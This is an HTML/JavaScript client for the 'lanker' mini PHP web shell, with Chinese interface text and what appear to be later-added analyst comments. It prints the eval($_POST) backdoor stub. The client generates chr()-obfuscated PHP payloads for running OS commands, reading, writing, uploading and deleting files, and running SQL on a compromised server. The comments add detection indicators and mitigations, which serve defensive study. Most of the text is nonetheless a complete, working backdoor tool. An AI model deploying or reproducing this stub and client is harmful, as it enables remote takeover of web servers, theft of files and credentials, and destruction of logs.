<!-- codz by Lanker(QQ:18779569)、孟兄(QQ:80607005) 2004/12/22 Modified By Hooligan(QQ:79015166) 2005/06/11-->
<!-- 修改版本解决了专家模式的magic_quote_gpc问题 -->
<HTML>
<HEAD>
<TITLE>lanker微型PHP后门客户端Hooligan修改版</TITLE>
<META content="text/html; charset=gb2312" http-equiv=Content-Type>
<META content="MSHTML 5.00.2614.3500" name=GENERATOR>
<style>
<!--
td {font-size:8pt; color: blue;font-family:Verdana}
INPUT {font-size:9pt;BORDER-RIGHT: #cccccc 1px solid; BORDER-TOP: #cccccc 1px solid; BORDER-LEFT: #cccccc 1px solid; COLOR: blue; BORDER-BOTTOM: #cccccc 1px solid; BACKGROUND-COLOR: #ffffff;FONT-STYLE:;}
textarea {font-size:9pt;BORDER-RIGHT: #cccccc 1px solid; BORDER-TOP: #cccccc 1px solid; BORDER-LEFT: #cccccc 1px solid; COLOR: blue; BORDER-BOTTOM: #cccccc 1px solid; BACKGROUND-COLOR: #ffffff;}
select {font-size:9pt;BORDER-RIGHT: #cccccc 1px solid; BORDER-TOP: #cccccc 1px solid; BORDER-LEFT: #cccccc 1px solid; COLOR: blue; BORDER-BOTTOM: #cccccc 1px solid; BACKGROUND-COLOR: #ffffff}
BODY {font-size:9pt; color: blue;font-family:Verdana; SCROLLBAR-FACE-COLOR: #ffffff; background color:#eeeeee;cursor:SCROLLBAR-HIGHLIGHT-COLOR: #ffffff; SCROLLBAR-SHADOW-COLOR: #aaaaaa; SCROLLBAR-3DLIGHT-COLOR: #aaaaaa; SCROLLBAR-ARROW-COLOR: #dddddd; SCROLLBAR-TRACK-COLOR: #ffffff; SCROLLBAR-DARKSHADOW-COLOR: #ffffff }
a:link {text-decoration:none; color:#336699}
a:visited {text-decoration:none; color:#336699}
a:active {text-decoration:none; color:#336699}
a:hover {COLOR: #b4c8d8; }
.tb {BORDER-RIGHT: #cccccc 1px solid; BORDER-TOP: #cccccc 1px solid; BORDER-LEFT: #cccccc 1px solid; BORDER-BOTTOM: #cccccc 1px solid;background-color:#cccccc}
.tb0 {BORDER-RIGHT: #cccccc 1px solid; BORDER-TOP: #cccccc 1px solid; BORDER-LEFT: #cccccc 1px solid; BORDER-BOTTOM: #cccccc 1px solid;background-color:#fcfcfc}
.tb1 {background-color:#ffffff}
-->
</STYLE>
</HEAD>
<BODY style="FONT-SIZE: 9pt" bgcolor="#cccccc">
<CENTER style="cursor:hand;">
<TABLE BORDER="2" ALIGN="center" BGCOLOR="#D6D3CE" style="BORDER-COLOR: #ffffff;">
<TR><TD><CENTER>
lanker微型<FONT color=#ff3300>PHP</font>后门客户端<font color=red>Hooligan修改版</font></font>
</CENTER></TD></TR></TABLE>
<hr size="1" color="#000080">
<FORM ENCTYPE="multipart/form-data" name=frm method=post target="mini">
<FIELDSET style="height:45px;width:100%;font-size:12px">
<LEGEND>服务端信息:</LEGEND>
<TABLE style="FONT-SIZE: 9pt;">
<tr><TD width=800 height=10>
木马地址: <INPUT style="BORDER-RIGHT: 1px solid; BORDER-TOP: 1px solid; FONT-SIZE: 9pt; BORDER-LEFT: 1px solid; BORDER-BOTTOM: 1px solid;WIDTH:50%" size=85 value=http://127.0.0.1/mini.php name=act />
登陆密码: <INPUT style="BORDER-RIGHT: 1px solid; BORDER-TOP: 1px solid; FONT-SIZE: 9pt; BORDER-LEFT: 1px solid; BORDER-BOTTOM: 1px solid" size=20 type=password value=pwd name=para />
<input type=hidden name='tmpcmd'>
</TD></tr>
</TABLE>
</FIELDSET>
<br />
<FIELDSET style="height:250px;width:100%;font-size:12px">
<LEGEND>程序代码:</LEGEND><br />
<TABLE width="98%">
<tr><TD>
<TABLE style="FONT-SIZE: 9pt" align=left>
<tr width="100%" height=20 align=left><td align=left width=100%>
<select onchange="showDiv(this.value);" width="100%">
<option value="digest">-----------------------------------------------------------基本功能列表-----------------------------------------------</option>
<option value="1" >PHP环境变量</option>
<option value="2" >本程序目录</option>
<option value="3" >执行CMD命令</option>
<option value="6" >读取目录</option>
<option value="14" >创建目录</option>
<option value="15" >删除目录</option>
<option value="4" >上传文件</option>
<option value="5" >读取文件</option>
<option value="12" >创建文件</option>
<option value="7" >复制文件</option>
<option value="8" >重命名文件</option>
<option value="9" >删除文件</option>
<option value="13" >下载文件</option>
<option value="11" >执行SQL语句</option>
<option value="10" >专家模式(自己写代码)</option>
</select></td></tr>
<tr height=260 width="100%" ><TD id="yunxing" align=left width=100%>
LANKER微型PHP后门服务端代码:<br><?php eval($_POST[pwd])?>
<hr size="1" color="#000080"><br>容错代码为:<br><?php @eval($_POST[pwd])?>
</TD></tr>
</TABLE></td>
<td>
</td></tr>
</table>
</FIELDSET>
</form>
<hr size="1" color="#000080">
<CENTER>
<center><font class=font>Mini PHP Web Shell v2.0<br>
-------------Code By <FONT color=#ff3300>lanker</font>、<FONT color=#ff3300>孟兄</font>, Modified By <font color=#ff3300>Hooligan</font> ----------- <br><FONT color=#ff3300>声明:请勿使用本程序从事非法行为,否则后果自负!</font></center>
</BODY></HTML>
<script language="javascript">
/**
 * Swap the contents of the "yunxing" table cell for the input form that
 * matches the operation picked in the drop-down.
 *
 * Analyst notes (web-shell client):
 * - Every generated button runs the same sequence: rename the hidden field
 *   `tmpcmd` to the text typed in the password box (`frm.para`), fill its value
 *   with PHP source, point the form at the URL in the `act` box, submit, then
 *   try to put the field name back.
 * - The request is therefore a multipart/form-data POST with one field whose
 *   NAME is the shared password and whose VALUE is PHP source. That matches the
 *   `eval($_POST[pwd])` server stub printed on this page.
 * - Cases "1", "2" and "4" send literal PHP text; the others call a builder
 *   function that encodes operator input as chr() chains.
 * - `yunxing`, `frm` and `document.all` are used as bare globals, so the page
 *   relies on legacy element-id/name globals.
 *
 * @param {string} aa - value of the selected option ("1".."15"); any other
 *   value, such as "digest", leaves the cell unchanged.
 */
function showDiv(aa){
switch(aa)
{
// "1": sends the literal PHP `phpinfo();`
case "1":
yunxing.innerHTML="PHP环境变量<br>"
yunxing.innerHTML+="<p align='center'><INPUT onclick='Javascipt:frm.tmpcmd.name=frm.para.value;frm.tmpcmd.value=\"phpinfo();\";frm.action=document.all.act.value;frm.submit();frm.tmpcmd.name=tmpcmd' type=button value='提 交' name=Send><br><br><br><br><br><br><br><br><br><br>"
break;
// "2": sends the literal PHP `echo dirname(__FILE__);`
case "2":
yunxing.innerHTML="<p align='center'>本程序目录<br><INPUT onclick='Javascipt:frm.tmpcmd.name=frm.para.value;frm.tmpcmd.value=\"echo dirname(__FILE__);\";frm.action=document.all.act.value;frm.submit();frm.tmpcmd.name=tmpcmd' type=button value='提 交' name=Send><br><br><br><br><br><br><br><br><br><br>"
break;
// "3": OS command box; payload built by cmd()
case "3":
yunxing.innerHTML="<p align='center'><INPUT size=30 name=\"aaaa\"><br><INPUT onclick='Javascipt:frm.tmpcmd.name=frm.para.value;cmd();frm.action=document.all.act.value;frm.submit();frm.tmpcmd.name=tmpcmd' type=button value='提 交' name=Send><br><br><br><br><br><br><br><br><br><br>"
break;
// "4": file upload; the file part is named LanKerF and the PHP copies it
// under its client-supplied name (relative path, no directory given)
case "4":
yunxing.innerHTML="<p align='center'><input NAME='LanKerF' TYPE='file' size=30><br><INPUT onclick='Javascipt:frm.tmpcmd.name=frm.para.value;frm.tmpcmd.value=\"if (copy($_FILES[LanKerF][tmp_name],$_FILES[LanKerF][name])) echo OK;\";frm.action=document.all.act.value;frm.submit();frm.tmpcmd.name=tmpcmd' type=button value='提 交' name=Send><br><br><br><br><br><br><br><br><br><br>"
break;
// "5": read a file; payload built by readfile()
case "5":
yunxing.innerHTML="<p align='center'>文件名:<br><INPUT size=50 name=\"duqu\"><br><INPUT onclick='Javascipt:frm.tmpcmd.name=frm.para.value;readfile();frm.action=document.all.act.value;frm.submit();frm.tmpcmd.name=tmpcmd' type=button value='提 交' name=Send> <br><br><br><br><br><br><br><br><br><br>"
break;
// "6": list a directory; payload built by readdir()
case "6":
yunxing.innerHTML="<p align='center'>目录名:<br><INPUT size=30 name=\"duqu\"><br><INPUT onclick='Javascipt:frm.tmpcmd.name=frm.para.value;readdir();frm.action=document.all.act.value;frm.submit();frm.tmpcmd.name=tmpcmd' type=button value='提 交' name=Send><br><br><br><br><br><br><br><br><br><br>"
break;
// "7": copy a file; payload built by copyfile()
case "7":
yunxing.innerHTML="<p align='center'>文件1:<br><INPUT size=30 name=\"file1\"><br>文件2:<br><INPUT size=30 name=\"file2\"><br><INPUT onclick='Javascipt:frm.tmpcmd.name=frm.para.value;copyfile();frm.action=document.all.act.value;frm.submit();frm.tmpcmd.name=tmpcmd' type=button value='提 交' name=Send><br><br><br><br><br><br><br><br><br><br>"
break;
// "8": rename a file; payload built by renamefile()
case "8":
yunxing.innerHTML="<p align='center'>文件1:<br><INPUT size=30 name=\"file1\"><br>文件2:<br><INPUT size=30 name=\"file2\"><br><INPUT onclick='Javascipt:frm.tmpcmd.name=frm.para.value;renamefile();frm.action=document.all.act.value;frm.submit();frm.tmpcmd.name=tmpcmd' type=button value='提 交' name=Send><br><br><br><br><br><br><br><br><br><br>"
break;
// "9": delete a file; payload built by delfile()
case "9":
yunxing.innerHTML="<p align='center'>文件名:<br><INPUT size=30 name=\"filen\"><br><INPUT onclick='Javascipt:frm.tmpcmd.name=frm.para.value;delfile();frm.action=document.all.act.value;frm.submit();frm.tmpcmd.name=tmpcmd' type=button value='提 交' name=Send><br><br><br><br><br><br><br><br><br><br>"
break;
// "10": "expert mode" free-form PHP; payload built by mycode()
case "10":
yunxing.innerHTML="<p align='left'><textarea rows='20' name='duqu' cols='120'>echo \"This is my code!\";</textarea>"
yunxing.innerHTML+="<br><INPUT onclick='Javascipt:frm.tmpcmd.name=frm.para.value;mycode();frm.action=document.all.act.value;frm.submit();frm.tmpcmd.name=tmpcmd' type=button value='提 交' name=Send>"
break;
// "11": database form (host, database, user, password, SQL); payload built by SQL()
case "11":
yunxing.innerHTML="主 机:<input NAME=\"servername\" TYPE=\"text\" value=\"localhost\" size=\"24\" ><BR>数据库:<input NAME=\"dbname\" TYPE=\"text\" value size=\"24\" > <BR>用户名:<input NAME=\"dbusername\" TYPE=\"text\" value=\"root\" size=\"24\" > <BR>密 码:<input NAME=\"dbpassword\" TYPE=\"text\" value size=\"24\" > <BR>SQL语句:<BR><textarea rows=\"8\" name=\"sql\" cols=\"100\" ></textarea>"
yunxing.innerHTML+="<br><INPUT onclick='Javascipt:frm.tmpcmd.name=frm.para.value;SQL();frm.action=document.all.act.value;frm.submit();frm.tmpcmd.name=tmpcmd' type=button value='提 交' name=Send>"
break;
// "12": create a file with given content; payload built by createfile()
case "12":
yunxing.innerHTML="<p align='left'>文件名:<INPUT size=30 name=\"filen\"><br>文件内容:<BR><textarea rows=\"16\" name=\"filec\" cols=\"120\" >注意:不支持中文字符!</textarea><br><INPUT onclick='Javascipt:frm.tmpcmd.name=frm.para.value;createfile();frm.action=document.all.act.value;frm.submit();frm.tmpcmd.name=tmpcmd' type=button value='提 交' name=Send><br><br><br><br><br><br><br><br><br><br>"
break;
// "13": download a file; payload built by downfile()
case "13":
yunxing.innerHTML="<p align='center'>文件名:<br><INPUT size=30 name=\"filen\"><br><INPUT onclick='Javascipt:frm.tmpcmd.name=frm.para.value;downfile();frm.action=document.all.act.value;frm.submit();frm.tmpcmd.name=tmpcmd' type=button value='提 交' name=Send><br><br><br><br><br><br><br><br><br><br>"
break;
// "14": create a directory; payload built by createdir()
case "14":
yunxing.innerHTML="<p align='center'>目录名:<br><INPUT size=30 name=\"dir\"><br><INPUT onclick='Javascipt:frm.tmpcmd.name=frm.para.value;createdir();frm.action=document.all.act.value;frm.submit();frm.tmpcmd.name=tmpcmd' type=button value='提 交' name=Send><br><br><br><br><br><br><br><br><br><br>"
break;
// "15": remove a directory; payload built by rmdir()
case "15":
yunxing.innerHTML="<p align='center'>目录名:<br><INPUT size=30 name=\"dir\"><br><INPUT onclick='Javascipt:frm.tmpcmd.name=frm.para.value;rmdir();frm.action=document.all.act.value;frm.submit();frm.tmpcmd.name=tmpcmd' type=button value='提 交' name=Send><br><br><br><br><br><br><br><br><br><br>"
break;
}
}
/**
 * "Expert mode" payload builder: writes PHP source into the hidden field
 * `frm.tmpcmd`.
 *
 * The textarea text (`frm.duqu`) is encoded by duqu() into a chr() chain,
 * assigned to `$cmd`, and passed to `@eval($cmd)`. On the server this is a
 * second eval nested inside the stub's own eval, so the operator's PHP never
 * appears as plain text in the request body.
 * Analyst note: content inspection that greps for PHP keywords will not match
 * this path. The long `chr(N).chr(N)...` run followed by `@eval($cmd)` is the
 * observable pattern.
 */
function mycode(){
frm.tmpcmd.value="$cmd="
frm.tmpcmd.value+=duqu(frm.duqu.value)
frm.tmpcmd.value+=";\n"
// `@` suppresses PHP error output from the nested eval.
frm.tmpcmd.value+="@eval($cmd);\n"
}
/**
 * OS-command payload builder: writes PHP source into `frm.tmpcmd`.
 *
 * The command typed into the `aaaa` input is chr()-encoded into `$cmd` and run
 * with PHP `system()`. The output is wrapped in the tags `<pre>` and `</pre>`,
 * themselves written as chr() chains (60,112,114,101,62 and
 * 60,47,112,114,101,62).
 * Analyst note: the command runs with the web server account's privileges.
 * Listing `system` in PHP's `disable_functions` blocks this path, but not the
 * stub's eval(), which is a language construct and cannot be disabled that way.
 */
function cmd(){
frm.tmpcmd.value="$cmd="
frm.tmpcmd.value+=duqu(frm.aaaa.value)
frm.tmpcmd.value+=";\n"
frm.tmpcmd.value+="echo chr(60).chr(112).chr(114).chr(101).chr(62);\n"
frm.tmpcmd.value+="@system($cmd);\n"
frm.tmpcmd.value+="echo chr(60).chr(47).chr(112).chr(114).chr(101).chr(62);\n"
}
/**
 * File-read payload builder: writes PHP source into `frm.tmpcmd`.
 *
 * The generated PHP opens the path typed into `frm.duqu`, reads
 * filesize($filename) bytes, HTML-escapes them with htmlspecialchars(), and
 * echoes the result between `<pre>` and `</pre>` (both built from chr() codes).
 * All file calls are prefixed with `@`, so failures produce no PHP warning.
 * Analyst note: any file readable by the web server account can be disclosed
 * this way. The path travels only as a chr() chain in the POST body.
 */
function readfile(){
frm.tmpcmd.value="$filename="
frm.tmpcmd.value+=duqu(frm.duqu.value)
frm.tmpcmd.value+=";\n"
frm.tmpcmd.value+="$s=chr(60).chr(112).chr(114).chr(101).chr(62);\n"
frm.tmpcmd.value+="$e=chr(60).chr(47).chr(112).chr(114).chr(101).chr(62);\n"
// The fopen mode is the bare word `r`, not a quoted string, which keeps quote
// characters out of the payload.
frm.tmpcmd.value+="$fp=@fopen($filename,r);\n"
frm.tmpcmd.value+="$contents=@fread($fp, filesize($filename));\n"
frm.tmpcmd.value+="@fclose($fp);\n"
frm.tmpcmd.value+="$contents=htmlspecialchars($contents);\n"
frm.tmpcmd.value+="echo $s.$contents.$e;\n"
}
/**
 * Directory-listing payload builder: writes PHP source into `frm.tmpcmd`.
 *
 * The generated PHP opens the directory typed into `frm.duqu` with dir(),
 * echoes its path and then each entry, each followed by `<br>`
 * (chr 60,98,114,62). If the directory cannot be opened it echoes `0`.
 * The labels `path_______` and `____` are unquoted bare words in the PHP.
 * Analyst note: responses from a compromised endpoint that begin with
 * `path_______` followed by a filesystem path are a recognisable artefact of
 * this client.
 */
function readdir(){
frm.tmpcmd.value="$dir="
frm.tmpcmd.value+=duqu(frm.duqu.value)
frm.tmpcmd.value+=";\n"
frm.tmpcmd.value+="$f = chr(60).chr(98).chr(114).chr(62);"
frm.tmpcmd.value+="$dir=@dir($dir);"
frm.tmpcmd.value+="if($dir) "
frm.tmpcmd.value+="{"
frm.tmpcmd.value+=" echo path_______.$dir->path.$f;"
frm.tmpcmd.value+=" while($entry=$dir->read())"
frm.tmpcmd.value+=" {"
frm.tmpcmd.value+=" echo ____.$entry.$f; "
frm.tmpcmd.value+=" }"
frm.tmpcmd.value+=" $dir->close();"
frm.tmpcmd.value+="}"
frm.tmpcmd.value+="else"
frm.tmpcmd.value+="{echo 0;}"
}
/**
 * SQL payload builder: writes PHP source into `frm.tmpcmd`.
 *
 * Host, user name, password, database name and SQL text from the form are each
 * chr()-encoded into PHP variables. The generated PHP connects with
 * mysql_connect(), selects the database, runs the statement with mysql_query()
 * and echoes a success or failure message. The failure branch appends
 * mysql_error(), and connection failures die() with "fail!"
 * (chr 102,97,105,108,33).
 * Analyst notes:
 * - The database credentials are supplied by the operator in the request, so
 *   they appear (chr-encoded) in the POST body. They are not read from the
 *   application's configuration by this function.
 * - The payload depends on the legacy mysql_* functions, which were removed in
 *   PHP 7.
 * - `$fgf` is assigned but never used in the generated PHP.
 */
function SQL(){
frm.tmpcmd.value="$message=chr(102).chr(97).chr(105).chr(108).chr(33);\n"
frm.tmpcmd.value+="$fgf=chr(32);\n"
frm.tmpcmd.value+="$servername="
frm.tmpcmd.value+=duqu(frm.servername.value)
frm.tmpcmd.value+=";\n"
frm.tmpcmd.value+="$dbusername="
frm.tmpcmd.value+=duqu(frm.dbusername.value)
frm.tmpcmd.value+=";\n"
frm.tmpcmd.value+="$dbpassword="
frm.tmpcmd.value+=duqu(frm.dbpassword.value)
frm.tmpcmd.value+=";\n"
frm.tmpcmd.value+="$dbname="
frm.tmpcmd.value+=duqu(frm.dbname.value)
frm.tmpcmd.value+=";\n"
frm.tmpcmd.value+="$sql="
frm.tmpcmd.value+=duqu(frm.sql.value)
frm.tmpcmd.value+=";\n"
frm.tmpcmd.value+="@mysql_connect($servername,$dbusername,$dbpassword) or die($message);\n"
frm.tmpcmd.value+="@mysql_select_db($dbname) or die($message);\n"
frm.tmpcmd.value+="$result = @mysql_query($sql);\n"
frm.tmpcmd.value+="if($result){\n"
frm.tmpcmd.value+="echo SQL语句成功执行;}\n"
frm.tmpcmd.value+="else{echo 失败.mysql_error();}\n"
frm.tmpcmd.value+="mysql_close();"
}
/**
 * File-write payload builder: writes PHP source into `frm.tmpcmd`.
 *
 * The generated PHP opens the path from `frm.filen` in mode "w" (chr 119),
 * which truncates or creates it, writes the text from `frm.filec`, and echoes
 * "OK!" (chr 79,75,33) when fwrite() reports a non-zero byte count.
 * Analyst note: this is the path by which further files can be dropped into
 * the web root. File-integrity monitoring on web-served directories and a web
 * root that the server account cannot write to both address it.
 */
function createfile(){
frm.tmpcmd.value="$filen="
frm.tmpcmd.value+=duqu(frm.filen.value)
frm.tmpcmd.value+=";\n"
frm.tmpcmd.value+="$filec="
frm.tmpcmd.value+=duqu(frm.filec.value)
frm.tmpcmd.value+=";\n"
frm.tmpcmd.value+="$a=chr(119);\n"
frm.tmpcmd.value+="$fp=@fopen($filen,$a);\n"
frm.tmpcmd.value+="$msg=@fwrite($fp,$filec);\n"
frm.tmpcmd.value+="if($msg) echo chr(79).chr(75).chr(33);\n"
frm.tmpcmd.value+="@fclose($fp);\n"
}
/**
 * File-copy payload builder: writes PHP source into `frm.tmpcmd`.
 *
 * The generated PHP copies the path in `frm.file1` to the path in `frm.file2`
 * with copy() and echoes "OK!" (chr 79,75,33) on success. `@` hides any PHP
 * warning, so a failed copy returns an empty response body.
 */
function copyfile(){
frm.tmpcmd.value="$file1="
frm.tmpcmd.value+=duqu(frm.file1.value)
frm.tmpcmd.value+=";\n"
frm.tmpcmd.value+="$file2="
frm.tmpcmd.value+=duqu(frm.file2.value)
frm.tmpcmd.value+=";\n"
frm.tmpcmd.value+="if (@copy($file1,$file2)) echo chr(79).chr(75).chr(33);\n"
}
/**
 * File-rename payload builder: writes PHP source into `frm.tmpcmd`.
 *
 * The generated PHP renames the path in `frm.file1` to the path in `frm.file2`
 * with rename() and echoes "OK!" (chr 79,75,33) on success. `@` hides any PHP
 * warning, so a failed rename returns an empty response body.
 */
function renamefile(){
frm.tmpcmd.value="$file1="
frm.tmpcmd.value+=duqu(frm.file1.value)
frm.tmpcmd.value+=";\n"
frm.tmpcmd.value+="$file2="
frm.tmpcmd.value+=duqu(frm.file2.value)
frm.tmpcmd.value+=";\n"
frm.tmpcmd.value+="if (@rename($file1,$file2)) echo chr(79).chr(75).chr(33);\n"
}
/**
 * File-download payload builder: writes PHP source into `frm.tmpcmd`.
 *
 * The generated PHP sets three response headers built from chr() codes and
 * then streams the file named in `frm.filen` with PHP readfile() before exit:
 *   $h  decodes to "Content-type: application/x-"
 *   $h1 decodes to "Content-Disposition: attachment; filename="
 *   $h2 is a "...escription: PHP3 Generated Data" string
 * Analyst notes, as response-side indicators visible in the generated text:
 * - The first term of $h2 is `(68)` rather than `chr(68)`, so the string the
 *   PHP builds starts with the digits 68 instead of the letter D.
 * - `$fe` is read from `$finfo` on the line before `$finfo` is assigned, so the
 *   Content-type suffix is presumably empty in practice (to be confirmed
 *   against a captured response).
 * - header($h2) is emitted a second time after the file body has been output.
 */
function downfile(){
frm.tmpcmd.value="$df="
frm.tmpcmd.value+=duqu(frm.filen.value)
frm.tmpcmd.value+=";\n"
// chr(46) is "." and is used to split the base name on dots.
frm.tmpcmd.value+="$f=chr(46);"
frm.tmpcmd.value+="$h=chr(67).chr(111).chr(110).chr(116).chr(101).chr(110).chr(116).chr(45).chr(116).chr(121).chr(112).chr(101).chr(58).chr(32).chr(97).chr(112).chr(112).chr(108).chr(105).chr(99).chr(97).chr(116).chr(105).chr(111).chr(110).chr(47).chr(120).chr(45);\n"
frm.tmpcmd.value+="$h1=chr(67).chr(111).chr(110).chr(116).chr(101).chr(110).chr(116).chr(45).chr(68).chr(105).chr(115).chr(112).chr(111).chr(115).chr(105).chr(116).chr(105).chr(111).chr(110).chr(58).chr(32).chr(97).chr(116).chr(116).chr(97).chr(99).chr(104).chr(109).chr(101).chr(110).chr(116).chr(59).chr(32).chr(102).chr(105).chr(108).chr(101).chr(110).chr(97).chr(109).chr(101).chr(61);\n"
frm.tmpcmd.value+="$h2=(68).chr(101).chr(115).chr(99).chr(114).chr(105).chr(112).chr(116).chr(105).chr(111).chr(110).chr(58).chr(32).chr(80).chr(72).chr(80).chr(51).chr(32).chr(71).chr(101).chr(110).chr(101).chr(114).chr(97).chr(116).chr(101).chr(100).chr(32).chr(68).chr(97).chr(116).chr(97);\n"
frm.tmpcmd.value+="$fn = basename($df);\n"
frm.tmpcmd.value+="$fe = $finfo[count($finfo)-1];\n"
frm.tmpcmd.value+="$finfo = explode($f, $fn);\n"
frm.tmpcmd.value+="header($h.$fe);\n"
frm.tmpcmd.value+="header($h1.$fn);\n"
frm.tmpcmd.value+="header($h2);\n"
frm.tmpcmd.value+="@readfile($df);\n"
frm.tmpcmd.value+="header($h2);\n"
frm.tmpcmd.value+="exit;\n"
}
/**
 * File-delete payload builder: writes PHP source into `frm.tmpcmd`.
 *
 * The generated PHP calls unlink() on the path typed into `frm.filen` and
 * echoes "OK!" (chr 79,75,33) on success. `@` suppresses the PHP warning on
 * failure.
 * Analyst note: this path can remove logs or other evidence that the web
 * server account is allowed to delete. Off-host log shipping keeps a copy out
 * of its reach.
 */
function delfile(){
frm.tmpcmd.value="$filen="
frm.tmpcmd.value+=duqu(frm.filen.value)
frm.tmpcmd.value+=";\n"
frm.tmpcmd.value+="if(@unlink($filen)) echo chr(79).chr(75).chr(33);"
}
/**
 * Directory-create payload builder: writes PHP source into `frm.tmpcmd`.
 *
 * The generated PHP calls mkdir() on the path typed into `frm.dir` with mode
 * 0777 and echoes "OK!" (chr 79,75,33) on success.
 * Analyst note: the requested mode is world-writable (subject to the process
 * umask). Unexpected 0777 directories under a web root are worth checking
 * during triage.
 */
function createdir(){
frm.tmpcmd.value="$dirs="
frm.tmpcmd.value+=duqu(frm.dir.value)
frm.tmpcmd.value+=";\n"
frm.tmpcmd.value+="if(@mkdir($dirs,0777)) echo chr(79).chr(75).chr(33);"
}
/**
 * Directory-remove payload builder: writes PHP source into `frm.tmpcmd`.
 *
 * The generated PHP calls PHP rmdir() on the path typed into `frm.dir` and
 * echoes "OK!" (chr 79,75,33) on success. `@` suppresses the PHP warning on
 * failure.
 */
function rmdir(){
frm.tmpcmd.value="$dirs="
frm.tmpcmd.value+=duqu(frm.dir.value)
frm.tmpcmd.value+=";\n"
frm.tmpcmd.value+="if(@rmdir($dirs)) echo chr(79).chr(75).chr(33);"
}
/**
 * Apparent leftover helper: nothing in the visible page calls it.
 * It invokes `alret`, which is not defined anywhere in the visible source, with
 * the literal string "document.frm.ifff.value". No field named `ifff` exists in
 * the form shown here.
 */
function returnc(){
alret("document.frm.ifff.value")
}
</script>
<script >
/**
 * Encode a string as a PHP expression made of chr() calls joined with ".".
 * Each UTF-16 code unit of the input becomes one `chr(N)` term, for example
 * "ab" becomes `chr(97).chr(98)`.
 *
 * Every payload builder on this page passes operator input through this
 * function, so the submitted PHP contains no quote characters. The page's
 * header comment says the modification addresses magic_quotes_gpc, and this
 * encoding is presumably how.
 * Analyst note: the same property defeats naive keyword matching on request
 * bodies. A long run of `chr(<digits>).` terms in a POST field sent to a PHP
 * endpoint is the pattern to look for instead.
 *
 * @param {string} zifu - text to encode.
 * @returns {string} the chr() chain, with no trailing ".".
 */
function duqu(zifu){
// The local variable shadows the function's own name inside this body.
var duqu="";
// The loop starts at 1 and encodes index i-1, so it covers every character
// except the last, each followed by ".". `i` is not declared here.
for(i=1;i<zifu.length;i++){
duqu+="chr("+zifu.charCodeAt(i-1)+").";
}
// The final character is appended without a trailing ".".
duqu+="chr("+zifu.charCodeAt(zifu.length-1)+")";
return duqu
}
</script>
服务端代码: